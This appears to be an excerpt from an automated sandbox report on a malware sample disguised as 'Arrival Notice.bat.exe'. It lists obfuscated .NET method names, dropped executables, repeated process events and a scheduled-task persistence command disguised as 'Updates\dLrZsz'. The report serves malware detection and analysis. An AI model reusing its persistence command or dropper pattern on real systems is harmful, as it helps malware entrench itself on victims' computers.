              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, pQFiwU6fgfEbmJWq1a.csHigh entropy of concatenated method names: 'FGUkJk6SHm', 'IlekE3YHeK', 'HyskHMo95q', 'MRfkREhqXR', 'abAkgGrMR9', 'eNokqJkHxg', 'FZiedSA9E1N2vHqJGR', 'JSTqGrjQbLdWw2It1G', 'A78kkacf2D', 'lxfkGfJ94F'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, kUUIwyxysMo95qiRfE.csHigh entropy of concatenated method names: 'vU3u3OUELb', 'bWAuMQOWlj', 'mFguIiKnj2', 'x0ouxWsolY', 'rtNug3NgCb', 'iNDuqRD2MI', 'qChu5MW0B8', 'kI7u0DaXqH', 'o3uuY17d1T', 'J86u4jLAeP'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, UqXR0rBKwYl6KpbAGr.csHigh entropy of concatenated method names: 'QiPj7IonL8', 'OlJjwnVdk9', 'vEOu9ZynlC', 'L2SunUfJfm', 'JJXuCovRdD', 'SWYuUNQmJ0', 'jpjuZ0EpLD', 'ngWuikrn2S', 'd6PuODrBrw', 'IX1uVmefNo'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, EX3wVfr004eVeKYXVR.csHigh entropy of concatenated method names: 'Dispose', 'EKakfYdB21', 'fuL8yXHtKY', 'p0Bee6mwY6', 'GNckt6FmWn', 't28kz8CiDK', 'ProcessDialogKey', 'J5F8p0ug0k', 'UI78khQblW', 'eS488ToZcT'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, OTisMayLhlOoUGF8U3.csHigh entropy of concatenated method names: 'pFLuw2ZVAPcASAWtvIj', 'CqaUOvZOxj6xjYUme9P', 'qaYCEnZGqWpNIPJ2prY', 'lPxF0HJbfV', 'uUCFYJvr88', 'JGvF4cS8W7', 'oT4m94ZMDZB3vdVXo89', 'PiUu5sZfwbTchOpK7FT'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, WoZcTFtqamvQ1L7sy1.csHigh entropy of concatenated method names: 'BATYkEWZsl', 'UMaYGbv2Uu', 'BjgY6rvaik', 'Ts7YAQQun5', 'anEYri9qJf', 'iLnYj8VNBm', 'CttYFmxsHL', 'jIL0TmIWYC', 'ffo0QxpoUX', 'AQk0fFXJQR'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, okDYTwZf7PavGHEBLr.csHigh entropy of concatenated method names: 'DyfJAcplLX', 'OSvJu1fy5L', 'lxEJFxfAeP', 'it7FtUjEfm', 'hOGFzeTMFH', 'vHfJpcf8yr', 'hrWJkAnsQG', 'KivJ87lFB2', 'KnnJGEckMP', 'ojcJ6O602i'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, x5EawHkG4nxGw0BwuPK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Shh4P1Tf6p', 'T1O4eNawhP', 'n1R4vMe3at', 'DEH4oKYU7P', 'msa4cEl0d8', 'hBk4hZRj0D', 'Wef4TF4mE1'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, dUh4iSmXZmKJxCUiTq.csHigh entropy of concatenated method names: 'XedSIqJu7N', 'WoJSxGnBX7', 'XLiSK2iPGR', 'nLySyCfJuV', 'lBOSnLkVSu', 'LV6SCG4TFf', 'TJ7SZ622f1', 'TGGSiA67hh', 'oxKSVIylQu', 'kukSXSvuTr'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, ztgapEOKN2bHXgpNfF.csHigh entropy of concatenated method names: 'bKUJN4vMXN', 'ttOJDKN34U', 'XuqJlMdCTI', 'eZBJ3D3S4v', 'cNZJ7cARLL', 'IQKJMrxPEC', 'lANJwHHVOW', 'YLtJIsoiZi', 'RkPJxs2CI2', 'dP8JB040oW'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, KkiYalvb0pSJvl1BpG.csHigh entropy of concatenated method names: 'ToString', 'sYFqXtMihq', 'Dkuqy8UAR4', 'UJZq9RwYDt', 'yyPqnAAptg', 'BGpqCfEqpC', 'lmOqU5Ih8N', 'j8dqZr3FFa', 'XlaqiG9YC6', 'pbuqOlhhBY'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, zSvR4xhHfejwjcBEkU.csHigh entropy of concatenated method names: 'V4l5QYescE', 'Nru5tSC6PW', 'zbO0p31AXB', 'TbT0kMBODc', 'dNo5XpRvtS', 'Ep55bIGSDC', 'pTf5mNPpQo', 'BtH5POhXwL', 'G9J5eprHT7', 'fjh5viL4uU'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.csHigh entropy of concatenated method names: 'vShG2QsdlJ', 'f6yGARiZYo', 'aMPGrEP2l3', 'nt9GuACMOu', 'BLXGjpDYXb', 'JmJGFllwV2', 'NNwGJLX8pB', 'qh4GEJowEq', 'TE2G16VGe6', 'zaTGHTaJkC'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, NGaMtZkpJEhdo2rIJPK.csHigh entropy of concatenated method names: 'umYYNlaQZU', 'KYYYDO7g8Z', 'oQPYlQ51no', 'jG3Y3KDyLF', 'EiJY7SmX3O', 'zRQYMC7td0', 'L86YwjU657', 'hnnYIWhprc', 'fkjYxlXhIc', 'WN4YBk2hSb'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, Kk6SHmInle3YHeKsC7.csHigh entropy of concatenated method names: 'nj1rPLrfW6', 'FJsreQOuF6', 'vtNrvt6EiI', 'GqQroG2Fkw', 'BfBrcdwEJT', 'aQKrhDgKKx', 'WfRrTmNnnf', 'I5nrQc6uL8', 'wZ4rfMec6x', 'J5grti9yQq'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, KkVjK88ZrPqOcWdeBx.csHigh entropy of concatenated method names: 'sL4lBrjvh', 'ziS3lZMBD', 'CGmMawGcs', 'sxtwSRVc8', 'h82xWGu91', 'EG5BY9YM9', 'F7AapfuoCtvPfuKBns', 'y8AmHmPmfm0RHsDZr9', 'jFg0JTtWZ', 'CpI4JfLrl'
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, yc6FmWQnW288CiDKC5.csHigh entropy of concatenated method names: 'AMr0AIrI2V', 'dY60r447El', 'RkZ0uOhNdK', 'kH50jll1Jb', 'SXb0FP1jCu', 'fIa0J3pgC1', 'g0R0Exaw5L', 'xSL013xYyE', 'Ucm0HGj4DI', 'tBG0R6twO5'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, CR92NoKJkHxgS8LFll.csHigh entropy of concatenated method names: 'uTCF2oKyBj', 'pEWFrQXKRA', 'gDhFjHnytB', 'dKlFJXLR2m', 'n4VFEyIByK', 'rF4jcYCdtX', 'Lp2jhw4uDt', 'w5HjTAcMqJ', 'PJ3jQR7ABm', 'VAQjfjJ4u2'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, i0ug0kfcI7hQblW2S4.csHigh entropy of concatenated method names: 'VSn0KjpqAx', 'VRD0yCQ5IO', 'nvO09ZdCLq', 'unt0nFmavx', 'byq0PTJC8u', 'ACX0CiqbWZ', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, pQFiwU6fgfEbmJWq1a.csHigh entropy of concatenated method names: 'FGUkJk6SHm', 'IlekE3YHeK', 'HyskHMo95q', 'MRfkREhqXR', 'abAkgGrMR9', 'eNokqJkHxg', 'FZiedSA9E1N2vHqJGR', 'JSTqGrjQbLdWw2It1G', 'A78kkacf2D', 'lxfkGfJ94F'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, kUUIwyxysMo95qiRfE.csHigh entropy of concatenated method names: 'vU3u3OUELb', 'bWAuMQOWlj', 'mFguIiKnj2', 'x0ouxWsolY', 'rtNug3NgCb', 'iNDuqRD2MI', 'qChu5MW0B8', 'kI7u0DaXqH', 'o3uuY17d1T', 'J86u4jLAeP'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, UqXR0rBKwYl6KpbAGr.csHigh entropy of concatenated method names: 'QiPj7IonL8', 'OlJjwnVdk9', 'vEOu9ZynlC', 'L2SunUfJfm', 'JJXuCovRdD', 'SWYuUNQmJ0', 'jpjuZ0EpLD', 'ngWuikrn2S', 'd6PuODrBrw', 'IX1uVmefNo'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, EX3wVfr004eVeKYXVR.csHigh entropy of concatenated method names: 'Dispose', 'EKakfYdB21', 'fuL8yXHtKY', 'p0Bee6mwY6', 'GNckt6FmWn', 't28kz8CiDK', 'ProcessDialogKey', 'J5F8p0ug0k', 'UI78khQblW', 'eS488ToZcT'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, OTisMayLhlOoUGF8U3.csHigh entropy of concatenated method names: 'pFLuw2ZVAPcASAWtvIj', 'CqaUOvZOxj6xjYUme9P', 'qaYCEnZGqWpNIPJ2prY', 'lPxF0HJbfV', 'uUCFYJvr88', 'JGvF4cS8W7', 'oT4m94ZMDZB3vdVXo89', 'PiUu5sZfwbTchOpK7FT'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, WoZcTFtqamvQ1L7sy1.csHigh entropy of concatenated method names: 'BATYkEWZsl', 'UMaYGbv2Uu', 'BjgY6rvaik', 'Ts7YAQQun5', 'anEYri9qJf', 'iLnYj8VNBm', 'CttYFmxsHL', 'jIL0TmIWYC', 'ffo0QxpoUX', 'AQk0fFXJQR'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, okDYTwZf7PavGHEBLr.csHigh entropy of concatenated method names: 'DyfJAcplLX', 'OSvJu1fy5L', 'lxEJFxfAeP', 'it7FtUjEfm', 'hOGFzeTMFH', 'vHfJpcf8yr', 'hrWJkAnsQG', 'KivJ87lFB2', 'KnnJGEckMP', 'ojcJ6O602i'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, x5EawHkG4nxGw0BwuPK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Shh4P1Tf6p', 'T1O4eNawhP', 'n1R4vMe3at', 'DEH4oKYU7P', 'msa4cEl0d8', 'hBk4hZRj0D', 'Wef4TF4mE1'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, dUh4iSmXZmKJxCUiTq.csHigh entropy of concatenated method names: 'XedSIqJu7N', 'WoJSxGnBX7', 'XLiSK2iPGR', 'nLySyCfJuV', 'lBOSnLkVSu', 'LV6SCG4TFf', 'TJ7SZ622f1', 'TGGSiA67hh', 'oxKSVIylQu', 'kukSXSvuTr'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, ztgapEOKN2bHXgpNfF.csHigh entropy of concatenated method names: 'bKUJN4vMXN', 'ttOJDKN34U', 'XuqJlMdCTI', 'eZBJ3D3S4v', 'cNZJ7cARLL', 'IQKJMrxPEC', 'lANJwHHVOW', 'YLtJIsoiZi', 'RkPJxs2CI2', 'dP8JB040oW'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, KkiYalvb0pSJvl1BpG.csHigh entropy of concatenated method names: 'ToString', 'sYFqXtMihq', 'Dkuqy8UAR4', 'UJZq9RwYDt', 'yyPqnAAptg', 'BGpqCfEqpC', 'lmOqU5Ih8N', 'j8dqZr3FFa', 'XlaqiG9YC6', 'pbuqOlhhBY'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, zSvR4xhHfejwjcBEkU.csHigh entropy of concatenated method names: 'V4l5QYescE', 'Nru5tSC6PW', 'zbO0p31AXB', 'TbT0kMBODc', 'dNo5XpRvtS', 'Ep55bIGSDC', 'pTf5mNPpQo', 'BtH5POhXwL', 'G9J5eprHT7', 'fjh5viL4uU'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.csHigh entropy of concatenated method names: 'vShG2QsdlJ', 'f6yGARiZYo', 'aMPGrEP2l3', 'nt9GuACMOu', 'BLXGjpDYXb', 'JmJGFllwV2', 'NNwGJLX8pB', 'qh4GEJowEq', 'TE2G16VGe6', 'zaTGHTaJkC'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, NGaMtZkpJEhdo2rIJPK.csHigh entropy of concatenated method names: 'umYYNlaQZU', 'KYYYDO7g8Z', 'oQPYlQ51no', 'jG3Y3KDyLF', 'EiJY7SmX3O', 'zRQYMC7td0', 'L86YwjU657', 'hnnYIWhprc', 'fkjYxlXhIc', 'WN4YBk2hSb'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, Kk6SHmInle3YHeKsC7.csHigh entropy of concatenated method names: 'nj1rPLrfW6', 'FJsreQOuF6', 'vtNrvt6EiI', 'GqQroG2Fkw', 'BfBrcdwEJT', 'aQKrhDgKKx', 'WfRrTmNnnf', 'I5nrQc6uL8', 'wZ4rfMec6x', 'J5grti9yQq'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, KkVjK88ZrPqOcWdeBx.csHigh entropy of concatenated method names: 'sL4lBrjvh', 'ziS3lZMBD', 'CGmMawGcs', 'sxtwSRVc8', 'h82xWGu91', 'EG5BY9YM9', 'F7AapfuoCtvPfuKBns', 'y8AmHmPmfm0RHsDZr9', 'jFg0JTtWZ', 'CpI4JfLrl'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, yc6FmWQnW288CiDKC5.csHigh entropy of concatenated method names: 'AMr0AIrI2V', 'dY60r447El', 'RkZ0uOhNdK', 'kH50jll1Jb', 'SXb0FP1jCu', 'fIa0J3pgC1', 'g0R0Exaw5L', 'xSL013xYyE', 'Ucm0HGj4DI', 'tBG0R6twO5'
              Source: C:\Windows\SysWOW64\compact.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exeJump to dropped file
              Source: C:\Windows\SysWOW64\compact.exeFile created: C:\Users\user\AppData\Local\Temp\-6qxw.exeJump to dropped file
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeFile created: C:\Users\user\AppData\Roaming\dLrZsz.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
